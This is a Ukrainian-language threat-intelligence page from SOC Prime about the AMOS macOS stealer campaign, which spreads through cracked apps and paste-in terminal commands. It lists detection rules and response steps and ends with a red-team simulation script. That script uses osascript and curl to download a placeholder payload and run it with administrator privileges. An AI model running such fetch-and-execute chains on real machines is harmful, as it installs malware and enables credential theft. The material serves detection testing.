SOC Prime Bias: Medium

08 May 2026 15:45 UTC

AMOS-крадій націлено на macOS через «зламані» додатки

Author Photo
SOC Prime Team linkedin icon Стежити
AMOS-крадій націлено на macOS через «зламані» додатки
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Звіт описує кампанію з розповсюдження Atomic macOS Stealer (AMOS), завуальованого під зламані додатки або ж шляхом інструкцій користувачам із запуску команд терміналу копіювання-вставки. Після виконання, шкідливе програмне забезпечення збирає широкий набір конфіденційних даних, включно з обліковими даними, інформацією про браузер, криптовалютними гаманцями, файлами додатків для обміну повідомленнями, профілями VPN та особистими документами, які потім передає викрадений вміст через HTTP або HTTPS. Щоб уникнути статичного виявлення, оператори змінюють домени та URL-адреси протягом всієї кампанії. Ці дії спрямовані на користувачів macOS, особливо тих, хто шукає неофіційні або піратські програми.

Розслідування

Телеметрія Trend Vision One використовувалась для реконструкції повного ланцюга зараження, починаючи з завантажень зламаних додатків з haxmac.cc, потім перенаправлення через проміжні домени, виконання шкідливих shell-скриптів, створення демонів запуску для збереження, підготовка даних у /tmp, стиснення в ZIP-архіви та ексфільтрація на змінювані домени, контрольовані нападниками. Дослідники зафіксували відповідні командні рядки, шляхи файлів та поведінкові індикатори, пов’язані з кожним етапом компрометації.

Захист

Організації повинні навчати користувачів про ризики використання зламаного програмного забезпечення та команд копіювання-вставки в терміналі, забезпечувати дотримання контролю Gatekeeper та нотації, а також обмежити виконання непотрібних скриптів у системах macOS. Захисникам також слід моніторити підозрілу активність curl and osascript і блокувати доступ до відомих шкідливих доменів та IP-адрес. Виявлення на кінцевих точках має фокусуватися на несанкціонованому створенні демонів запуску, прихованому розміщенні файлів та незвичайній поведінці зі збору чи ексфільтрації файлів.

Відповідь

Якщо виявлено активність AMOS, ізолюйте уражену кінцеву точку, зупиніть шкідливі процеси, видаліть приховані файли, такі як .helper, .agentі com.finder.helper.plistта видаліть будь-які підготовлені дані для ексфільтрації. Скомпрометовані облікові дані повинні бути відкликані, а судово-медичний аналіз слід провести над будь-якими відновленими архівами. Виявлена шкідлива інфраструктура повинна бути заблокована, а вміст виявлення оновлено для моніторингу виявлених шаблонів команд.

Потік Атаки

Виявлення

Підозріле Використання Ditto для Архівування та Ексфільтрації Файлів на macOS (через process_creation)

Команда SOC Prime
08 травня 2026

Можливе Багатофайлове Створення у TMP Директорії для Ексфільтрації (через file_event)

Команда SOC Prime
09 січня 2026

Atomic MacOS Stealer – Діяльність FileGrabber

Onn, Robbin Ooi Zhen Heng, Jason Phang Vern
24 листопада 2025

Можливе Копіювання Даних для Входу Chrome у TMP Директорію (через process_creation)

Команда SOC Prime
16 вересня 2025

IOCs (HashSha1) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки

AI Правила SOC Prime
08 травня 2026

IOCs (SourceIP) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки

AI Правила SOC Prime
08 травня 2026

IOCs (DestinationIP) для виявлення: Аналіз кампанії AMOS Stealer, націленої на macOS через ‘зламані’ додатки

AI Правила SOC Prime
08 травня 2026

Виявлення Виконання AMOS Stealer через Команди Терминалу на macOS [Linux Створення Процесів]

AI Правила SOC Prime
08 травня 2026

Виявлення Виконання AMOS Stealer через AppleScript та Curl [Linux Створення Процесів]

AI Правила SOC Prime
25 листопада 2025

Виконання Симуляцій

Передумова: Перевірка Телеметрії та Базової лінії повинна бути пройдена.

Основи: Цей розділ детально описує конкретне виконання техніки противника (TTP), призначене для спрацювання правила виявлення. Команди та наратив ПОВИННІ безпосередньо відбивати виявлені TTP та прагнути створити точну телеметрію, що очікується за логікою виявлення. Абстрактні або нерелевантні приклади приведуть до невірної діагностики.

  • Опис атаки та команди:
    Противник отримав фішингову приманку, яка доставляє короткий AppleScript масив. Сценарій використовує osascript для виконання команди shell (sh -c), яка викликає curl для завантаження бінарного файлу AMOS stealer з серверу C2, зберігає його в папці користувача ~/Library/Application Support/ та потім виконують його з підвищеними привілеями. Використання osascript (підписаний бінарний файл Apple) маскує активність як легітимну автоматизацію, а curl забезпечує тиху мережеву завантаження.

  • Скрипт регресійного тесту:

    # amos_stealer_simulation.sh
    # Симуляція виконання AMOS stealer на macOS з використанням osascript + curl
    
    # 1. Визначити шкідливий URL (використовуйте безпечний заповнювач для безпеки)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    
    # 2. AppleScript, що виконує команду shell для завантаження та виконання масиву
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    
    # 3. Виконати AppleScript через osascript
    echo "$APPLESCRIPT" | osascript
    
    # 4. Коротка зупинка, щоб дозволити масиву запуститися
    sleep 5
  • Команди очищення:

    # cleanup_amos_simulation.sh
    # Видалити артефакти, створені в результаті симуляції
    
    # Видалити завантажений масив
    rm -f /tmp/payload.sh
    
    # Відкликати тимчасові процеси з підвищенням привілеїв (якщо вони ще виконуються)
    pkill -f "/tmp/payload.sh" || true
    
    # Опціонально, очистити історію виконання AppleScript
    # (macOS не зберігає постійну історію для osascript)
    echo "Очищення завершено."